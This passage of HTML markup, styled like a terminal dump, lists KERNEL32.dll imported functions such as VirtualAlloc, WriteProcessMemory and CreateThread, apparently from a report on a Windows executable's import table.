class="Apple-converted-space"> </span>- KERNEL32.dll.FindFirstFileExW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetStdHandle</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetFilePointerEx</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.ReadConsoleW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetConsoleCP</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- 
KERNEL32.dll.FlushFileBuffers</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.TlsFree</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.TlsSetValue</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.TlsGetValue</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.TlsAlloc</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.TerminateProcess</span></p><p class="p1" 
style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetProcAddress</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.FlushInstructionCache</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.VirtualAlloc</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.VirtualFree</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.VirtualProtect</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: 
#f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.VirtualQuery</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.WriteProcessMemory</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.LCMapStringW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.LoadLibraryW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetModuleHandleA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; 
font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.ExitProcess</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetUnhandledExceptionFilter</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.ExitThread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetLastError</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span 
class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetSystemDirectoryW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetVolumeInformationW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetComputerNameW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.FreeLibrary</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetCurrentProcess</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: 
no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetCurrentProcessId</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetCurrentThreadId</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetLastError</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetModuleHandleW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetHandleInformation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span 
class="Apple-converted-space"> </span>- KERNEL32.dll.GetSystemDirectoryA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GlobalFree</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.Sleep</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetStdHandle</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetFileType</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- 
KERNEL32.dll.MultiByteToWideChar</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.FindClose</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.WideCharToMultiByte</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.CloseHandle</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.QueryPerformanceCounter</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetTickCount</span></p><p 
class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GlobalMemoryStatus</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.FlushConsoleInputBuffer</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.InitializeCriticalSectionAndSpinCount</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.UnhandledExceptionFilter</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.RtlVirtualUnwind</span></p><p class="p1" 
style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.RtlLookupFunctionEntry</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.RtlCaptureContext</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.FreeEnvironmentStringsW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetEnvironmentVariableA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.FileTimeToLocalFileTime</span></p><p class="p1" 
style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetFileInformationByHandle</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.PeekNamedPipe</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetFullPathNameW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetCurrentDirectoryW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.HeapSize</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); 
color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetEndOfFile</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.LoadLibraryA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetFileSize</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetEnvironmentStringsW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetModuleFileNameA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; 
font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetStartupInfoW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.DeleteCriticalSection</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetCPInfo</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetOEMCP</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetACP</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; 
font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.IsValidCodePage</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.WriteFile</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.ReadFile</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.CreateFileA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.CreateThread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span 
class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.TerminateThread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.ResumeThread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetEvent</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.ReleaseMutex</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- 
KERNEL32.dll.WaitForSingleObject</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.CreateMutexA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.CreateEventA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.WaitForMultipleObjects</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetSystemTime</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SystemTimeToFileTime</span></p><p 
